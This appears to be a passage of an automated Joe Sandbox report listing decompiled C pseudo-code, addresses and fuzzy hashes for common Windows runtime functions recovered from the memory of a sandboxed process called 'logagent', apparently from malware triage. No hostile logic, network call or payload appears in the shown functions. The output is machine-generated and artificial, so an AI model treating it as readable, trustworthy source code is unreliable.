				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E051D2280(_t6, 0x52a8550);
				}
				_t29 = E051F387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E051CFFB0(0x52a8550, _t27, 0x52a8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                              0x051f37fa
                                              0x051f37fc
                                              0x051f3805
                                              0x051f3808
                                              0x051f3808
                                              0x051f3814
                                              0x051f3818
                                              0x051f3846
                                              0x051f3848
                                              0x051f384b
                                              0x051f384b
                                              0x051f3852
                                              0x00000000
                                              0x051f3854
                                              0x051f3856
                                              0x00000000
                                              0x00000000
                                              0x051f3863
                                              0x00000000
                                              0x051f3863
                                              0x051f381a
                                              0x051f381a
                                              0x051f381f
                                              0x051f386e
                                              0x051f386e
                                              0x051f3871
                                              0x051f3873
                                              0x051f3873
                                              0x051f3868
                                              0x00000000
                                              0x051f3868
                                              0x051f3821
                                              0x051f3826
                                              0x00000000
                                              0x00000000
                                              0x051f3828
                                              0x051f382a
                                              0x051f3841
                                              0x00000000
                                              0x051f3841

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 518f0893a836e7cf23978ad92778d3ecc3c577ca3f67e01fc1a30a99b72d5af5
                                              • Instruction ID: 6351400ee4b5f83df20f615c2c06dbe09931cc0941f7099ef7fabd19d4014f41
                                              • Opcode Fuzzy Hash: 518f0893a836e7cf23978ad92778d3ecc3c577ca3f67e01fc1a30a99b72d5af5
                                              • Instruction Fuzzy Hash: AA01DBB2A055105BC3378B19E544E36BBE7EF85B50716496DEA658B311D738CC01C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051E002D Relevance: .1, Instructions: 55COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E051E002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E051D7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E051D7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E051D7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E051D7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                              0x051e0032
                                              0x051e0037
                                              0x051e0043
                                              0x05224b3a
                                              0x051e0049
                                              0x051e0049
                                              0x051e0049
                                              0x051e004e
                                              0x051e0053
                                              0x05224b48
                                              0x05224b5a
                                              0x05224b4a
                                              0x05224b53
                                              0x05224b53
                                              0x05224b5f
                                              0x00000000
                                              0x05224b61
                                              0x00000000
                                              0x05224b61
                                              0x051e0059
                                              0x051e0059
                                              0x051e0060
                                              0x05224b6f
                                              0x05224b6f
                                              0x051e0069
                                              0x05224b83
                                              0x00000000
                                              0x00000000
                                              0x05224b90
                                              0x05224b9b
                                              0x05224b9b
                                              0x05224ba4
                                              0x00000000
                                              0x00000000
                                              0x05224baa
                                              0x00000000
                                              0x051e006f
                                              0x051e006f
                                              0x00000000
                                              0x051e006f
                                              0x051e0069

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                              • Instruction ID: 40e8bbbca6496bb2b225f12c201200a28fb0330675a796d508acbd1780728a00
                                              • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                              • Instruction Fuzzy Hash: 4611483AA15A929FDB23E724C94CB3177D6FF05784F0A00A0DC09C7A92E36AD840C3A0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051C766D Relevance: .1, Instructions: 54COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 94%
                                              			E051C766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E051EF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E051EF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L051D4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                              0x051c7672
                                              0x051c767f
                                              0x051c7689
                                              0x051c76de
                                              0x051c76de
                                              0x051c768b
                                              0x051c7691
                                              0x051c7693
                                              0x051c7697
                                              0x00000000
                                              0x051c7699
                                              0x051c76a8
                                              0x00000000
                                              0x051c76aa
                                              0x051c76ad
                                              0x051c76b1
                                              0x00000000
                                              0x051c76b3
                                              0x051c76b3
                                              0x051c76b5
                                              0x051c76ba
                                              0x051c76bc
                                              0x051c76bc
                                              0x051c76c0
                                              0x00000000
                                              0x051c76c2
                                              0x051c76ce
                                              0x051c76ce
                                              0x051c76c0
                                              0x051c76b1
                                              0x051c76a8
                                              0x051c7697
                                              0x051c76d9

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                              • Instruction ID: 0742590bb92c09e66205d3230027fd5721523abfbd3fa8c1aea667d1710ac163
                                              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                              • Instruction Fuzzy Hash: 9B01D832300128ABD720DE5ECC54E5B7BADEBA4760B14016CB909CB284DBB2DC41CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0524C450 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 46%
                                              			E0524C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E051F9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E051F95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E051F95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E051F95D0();
				return L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                              0x0524c458
                                              0x0524c45d
                                              0x0524c466
                                              0x0524c468
                                              0x0524c469
                                              0x0524c46a
                                              0x0524c46b
                                              0x0524c46e
                                              0x0524c46f
                                              0x0524c471
                                              0x0524c476
                                              0x0524c476
                                              0x0524c47c
                                              0x0524c47e
                                              0x0524c480
                                              0x0524c480
                                              0x0524c483
                                              0x0524c484
                                              0x0524c486
                                              0x0524c488
                                              0x0524c48f
                                              0x0524c491
                                              0x0524c493
                                              0x0524c493
                                              0x0524c48f
                                              0x0524c498
                                              0x0524c49e
                                              0x0524c4ad
                                              0x0524c4ad
                                              0x0524c4b2
                                              0x0524c4b4
                                              0x0524c4cd

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                              • Instruction ID: a23995573968a761b5d8e7f70ee00f999ba5a6573c5560ccd5beddddc251e3de
                                              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                              • Instruction Fuzzy Hash: C7019E72241506BFD725BF69CD88F62F76DFF543A0F004526F218525A1CB22ACA1CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051B9080 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 69%
                                              			E051B9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x52a85ec;
				E051D2280(_t48, 0x52a85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E051CFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x52a538c; // 0x77e06888
					if( *_t84 != 0x52a5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x528f6e8);
						E0520D0E8(0x52a85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E052888F5(_t80, _t85, 0x52a5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x52a86c0; // 0x34507b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x52a86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E051D2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E052888F5(0x52a85ec, _t85, 0x52a5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E051FAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x52ab1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x52a84c0;
																			if(_t82 >=  *0x52a84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E05289063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E051B922A(_t99);
										_t64 = E051D7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E05288B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x52a86c0; // 0x34507b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x52a86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x52a86bc;
													_t87 = 0x52a86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E051B9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x52a86c4;
												_t87 = 0x52a86c0;
												L27:
												E051E9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0520D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x52a5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x52a538c = _t51;
						goto L6;
					}
				}
			}




















                                              0x051b9082
                                              0x051b9083
                                              0x051b9084
                                              0x051b9085
                                              0x051b9087
                                              0x051b9096
                                              0x051b9098
                                              0x051b9098
                                              0x051b909e
                                              0x051b90a8
                                              0x051b90e7
                                              0x051b90e7
                                              0x051b90aa
                                              0x051b90b0
                                              0x051b90b7
                                              0x051b90bd
                                              0x051b90dd
                                              0x051b90e6
                                              0x051b90bf
                                              0x051b90bf
                                              0x051b90c7
                                              0x051b90cf
                                              0x051b90f1
                                              0x051b90f2
                                              0x051b90f4
                                              0x051b90f5
                                              0x051b90f6
                                              0x051b90f7
                                              0x051b90f8
                                              0x051b90f9
                                              0x051b90fa
                                              0x051b90fb
                                              0x051b90fc
                                              0x051b90fd
                                              0x051b90fe
                                              0x051b90ff
                                              0x051b9100
                                              0x051b9102
                                              0x051b9107
                                              0x051b910c
                                              0x051b9110
                                              0x051b9113
                                              0x051b9115
                                              0x051b9136
                                              0x051b913f
                                              0x051b9143
                                              0x052137e4
                                              0x052137e4
                                              0x051b9117
                                              0x051b9117
                                              0x051b911d
                                              0x00000000
                                              0x051b911f
                                              0x051b911f
                                              0x051b9125
                                              0x00000000
                                              0x051b9127
                                              0x051b912d
                                              0x051b9130
                                              0x051b9134
                                              0x051b9158
                                              0x051b915d
                                              0x051b9161
                                              0x051b9168
                                              0x05213715
                                              0x051b916e
                                              0x051b916e
                                              0x051b9175
                                              0x051b9177
                                              0x051b917e
                                              0x051b917f
                                              0x051b9182
                                              0x051b9182
                                              0x051b9187
                                              0x051b9187
                                              0x051b918a
                                              0x051b918d
                                              0x051b918f
                                              0x051b9192
                                              0x051b9195
                                              0x051b9198
                                              0x051b9198
                                              0x051b9198
                                              0x051b919a
                                              0x00000000
                                              0x00000000
                                              0x0521371f
                                              0x05213721
                                              0x05213727
                                              0x0521372f
                                              0x05213733
                                              0x05213735
                                              0x05213738
                                              0x0521373b
                                              0x0521373d
                                              0x05213740
                                              0x00000000
                                              0x05213746
                                              0x05213746
                                              0x05213749
                                              0x00000000
                                              0x0521374f
                                              0x0521374f
                                              0x05213751
                                              0x05213757
                                              0x05213759
                                              0x0521375c
                                              0x0521375c
                                              0x0521375e
                                              0x0521375e
                                              0x05213761
                                              0x05213764
                                              0x00000000
                                              0x00000000
                                              0x05213766
                                              0x05213768
                                              0x052137a3
                                              0x052137a3
                                              0x052137a5
                                              0x052137a7
                                              0x052137ad
                                              0x052137b0
                                              0x052137b2
                                              0x052137bc
                                              0x052137c2
                                              0x052137c2
                                              0x052137b2
                                              0x051b9187
                                              0x051b9187
                                              0x051b918a
                                              0x051b918d
                                              0x051b918f
                                              0x051b9192
                                              0x051b9195
                                              0x00000000
                                              0x051b9195
                                              0x00000000
                                              0x0521376a
                                              0x0521376a
                                              0x0521376a
                                              0x0521376c
                                              0x0521376c
                                              0x0521376f
                                              0x05213775
                                              0x00000000
                                              0x00000000
                                              0x05213777
                                              0x05213779
                                              0x05213782
                                              0x05213787
                                              0x05213789
                                              0x05213790
                                              0x05213790
                                              0x0521378b
                                              0x0521378b
                                              0x0521378b
                                              0x05213792
                                              0x05213795
                                              0x00000000
                                              0x05213795
                                              0x00000000
                                              0x05213779
                                              0x05213798
                                              0x00000000
                                              0x05213798
                                              0x00000000
                                              0x05213768
                                              0x0521379b
                                              0x0521379b
                                              0x05213751
                                              0x05213749
                                              0x00000000
                                              0x05213740
                                              0x051b91a0
                                              0x051b91a3
                                              0x051b91a9
                                              0x051b91b0
                                              0x00000000
                                              0x051b91b0
                                              0x051b9187
                                              0x051b91b4
                                              0x051b91b4
                                              0x051b91bb
                                              0x051b91c0
                                              0x051b91c5
                                              0x051b91c7
                                              0x052137da
                                              0x051b91cd
                                              0x051b91cd
                                              0x051b91cd
                                              0x051b91d2
                                              0x051b91d5
                                              0x051b9239
                                              0x051b9239
                                              0x051b91d7
                                              0x051b91db
                                              0x051b91e1
                                              0x051b91e7
                                              0x051b91fd
                                              0x051b9203
                                              0x051b921e
                                              0x051b9223
                                              0x00000000
                                              0x051b9205
                                              0x051b9205
                                              0x051b9208
                                              0x051b920c
                                              0x051b9214
                                              0x051b9214
                                              0x051b920c
                                              0x051b91e9
                                              0x051b91e9
                                              0x051b91ee
                                              0x051b91f3
                                              0x051b91f3
                                              0x051b91f3
                                              0x051b91e7
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x051b9134
                                              0x051b9125
                                              0x051b911d
                                              0x051b914e
                                              0x051b90d1
                                              0x051b90d1
                                              0x051b90d3
                                              0x051b90d6
                                              0x051b90d8
                                              0x00000000
                                              0x051b90d8
                                              0x051b90cf

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7129d8092dc2329fed8ab31d987586dd3dfd497598d9e53782a79161f6e28050
                                              • Instruction ID: 1fcda9fd6d668d4ffe7209f39079f8de60135d03db028ddf3e404cde4f8d8f8b
                                              • Opcode Fuzzy Hash: 7129d8092dc2329fed8ab31d987586dd3dfd497598d9e53782a79161f6e28050
                                              • Instruction Fuzzy Hash: B101F9736116048FD7188F04E844B22BBBAFF81310F214066F6018B691C7F8DC42CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05284015 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E05284015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E051D2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E051D2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x52a86ac);
					E051BF900(0x52a86d4, _t28);
					E051CFFB0(0x52a86ac, _t28, 0x52a86ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E051CFFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L051D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                              0x0528401a
                                              0x0528401e
                                              0x05284023
                                              0x05284028
                                              0x05284029
                                              0x0528402b
                                              0x0528402f
                                              0x05284043
                                              0x05284046
                                              0x05284051
                                              0x05284057
                                              0x0528405f
                                              0x05284062
                                              0x05284067
                                              0x0528406f
                                              0x0528407c
                                              0x0528407c
                                              0x0528408c
                                              0x0528408c
                                              0x05284097

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3631b2102cafc920710f69ffa1ddc28738f77b0278745791d656bcf95a7c1d27
                                              • Instruction ID: 3ea3bf90bb52dd1532d07df8082a596abe8b5a5b0f5bf794c51d2e9d5ec1508f
                                              • Opcode Fuzzy Hash: 3631b2102cafc920710f69ffa1ddc28738f77b0278745791d656bcf95a7c1d27
                                              • Instruction Fuzzy Hash: 150184723119457FD651BB79CD88E13F7ACFF45650B000229F51883A52DB78EC11C6E4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 052714FB Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 61%
                                              			E052714FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x52ad360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E051FFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E051D7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E051FB640(E051F9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                              0x052714fb
                                              0x052714fb
                                              0x0527150a
                                              0x05271514
                                              0x05271519
                                              0x0527151b
                                              0x05271526
                                              0x0527152c
                                              0x05271534
                                              0x05271537
                                              0x0527153a
                                              0x05271545
                                              0x05271557
                                              0x05271547
                                              0x05271550
                                              0x05271550
                                              0x05271562
                                              0x05271563
                                              0x05271565
                                              0x0527156a
                                              0x0527157f

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3112237a267711e73a24ec7fe441c133dda8ab9d23c26fcfdda1152a08cc6f8
                                              • Instruction ID: 811129d7d8deff2856e32bd38be414fbb322cc99709a732b4f869b6e817d0b26
                                              • Opcode Fuzzy Hash: a3112237a267711e73a24ec7fe441c133dda8ab9d23c26fcfdda1152a08cc6f8
                                              • Instruction Fuzzy Hash: A5019271A1025CAFCB04EF69D845FAEBBB8EF44710F404056F905EB381DA74DA10CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0527138A Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
